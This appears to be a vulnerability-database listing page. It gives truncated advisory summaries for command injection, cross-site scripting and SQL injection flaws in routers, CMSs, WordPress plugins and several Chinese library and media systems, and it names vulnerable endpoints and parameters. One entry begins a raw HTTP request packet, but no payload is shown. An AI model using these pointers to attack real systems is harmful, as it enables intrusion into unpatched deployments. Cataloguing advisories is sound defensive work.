Tenda Router AC11 - Remote Command Injection

Tenda Router AC11 is susceptible to remote command injection vulnerabilities in the web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. id: CVE-2021-31755 info: name: Tenda Router AC11 - Remote Comman...

CVE-2026-42556

Postiz is an AI social media scheduling tool. From version 2.21.6 to before version 2.21.7, any authenticated user who can create a post can store arbitrary HTML in post content by tampering their own save request and send the public preview link /p/?share=true to another user. The preview page...

PT-2026-20832

Comodo Dome Firewall 2.7.0 contains a reflected cross-site scripting vulnerability that allows attackers to inject malicious scripts by submitting crafted input to the openvpn advanced endpoint. Attackers can inject JavaScript code through the GLOBAL NETWORKS and GLOBAL DNS parameters via POST...

PT-2026-5573

Banco Guayaquil 8.0.0 mobile iOS application contains a persistent cross-site scripting vulnerability in the TextBox Name Profile input. Attackers can inject malicious script code through a POST request that executes on application review without user interaction...

GHSA-269J-37WW-CMH3 Mezzanine CMS vulnerable to Cross-site Scripting

A cross-site scripting XSS vulnerability in the component /blog/blogpost/add of Mezzanine CMS v6.1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into a blog post...

PT-2025-30602 · Unknown · Mezzanine Cms

Name of the Vulnerable Software and Affected Versions: Mezzanine CMS version 6.1.0 Description: A cross-site scripting XSS vulnerability exists in the /blog/blogpost/add component of Mezzanine CMS. This allows attackers to execute arbitrary web scripts or HTML by injecting a crafted payload into ...

SUSE CVE-2013-3241

export.php aka the export script in phpMyAdmin 4.x before 4.0.0-rc3 overwrites global variables on the basis of the contents of the POST superglobal array, which allows remote authenticated users to inject values via a crafted request...

Ghost Foundation Ghost 跨站脚本漏洞

Ghost Foundation Ghost is an open source personal blog system written in JavaScript by Ghost. A cross-site scripting vulnerability exists in Ghost Foundation Ghost version 5.9.4. An attacker exploits this vulnerability to send HTTP requests to inject Javascript into posts to trick administrators...

CVE-2022-37721

PyroCMS 3.9 is vulnerable to a stored Cross Site Scripting XSS when a low privileged user such as an author, injects a crafted html and javascript payload in a blog post, leading to full admin account takeover or privilege escalation...

Code injection

Adobe Acrobat and Reader versions 2018.011.20038 and earlier, 2017.011.30079 and earlier, and 2015.006.30417 and earlier have an XFA '\n' POST injection vulnerability. Successful exploitation could lead to a security bypass...

WordPress Plugin Mail Masta 1.0 - SQL Injection

Vulnerability information Vulnerability title: WordPress Plugin Mail Masta 1.0 - SQL Injection Plugin home page: https://wpcore.com/plugin/mail-masta Vulnerability type: SQL injection CVE : CVE-2017-6095, CVE-2017-6096, CVE-2017-6097, CVE-2017-6098 Vulnerability analysis The first injection...

SQL injection vulnerability in DropDownList1 parameter of ScarchList.aspx, a bibliographic data retrieval system of Beijing Jinpan Pengtu Software Technology Co.

Beijing Jinpan Pengtu Software Technology Co., Ltd. is a high-tech enterprise specializing in the research and development of library information automation products, promotion and application and system maintenance. Beijing Jinpan Pengtu Software Technology Co., Ltd. library management system /...

SQL Injection Vulnerability in Marc Parameters of Shenzhen Ketu Automation New Technology Application Company ilasIII Digital Library System xk/zdframe.jsp Page

Integrated Library Automation System ILAS is the Ministry of Culture in 1988 as a national key scientific and technological projects issued by the Shenzhen Library to undertake and organize the development of a set of libraries at home and abroad to adapt to different levels, a variety of scales,...

SQL injection vulnerability in the user_name parameter of Request.aspx page of Nanjing Fargo Streaming Media System.

Nanjing Fargo streaming media system is mainly used for applications such as network TV, live event broadcasting, remote education, enterprise roadshow and multimedia public information service, etc. The system integrates computer, network, audio/video and mobile communication and other related...

SQL Injection Vulnerability in UserGUID Parameter of UserDataSync.aspx Page of Nanjing Fargo Streaming Media System

Nanjing Fargo streaming media system is mainly used for applications such as network TV, live event broadcasting, remote education, enterprise roadshow and multimedia public information service, etc. The system integrates computer, network, audio/video and mobile communication and other related...

The micro-engine technology /payment/unionpay/notify.php POST-injection

No description provided by source...

金窗教务系统 /web/web/kebiao/kebiao.asp 等8处POST注入

No description provided by source...

E-TILLER期刊采编系统/ch/reader/wait_published_articles.aspx等8处 POST注入漏洞

No description provided by source...

E-TILLER期刊采编系统 /ch/reader/inner_key_query_article_list.aspx等2处 POST注入漏洞

No description provided by source...

某在线培训系统SQL盲注漏洞

简要描述： rt 详细说明： 官网站：http://.../Login.aspx 在注册用户，检测用户名是否存在 处存在POST注入！ 附：...:8000/ 一例 数据包如下： POST /CscAjax/ajax.aspx HTTP/1.1 Host: ... Proxy-Connection: keep-alive Content-Length: 63 Accept: text/html, / Origin: http://... X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 Windows NT 6.1; WOW...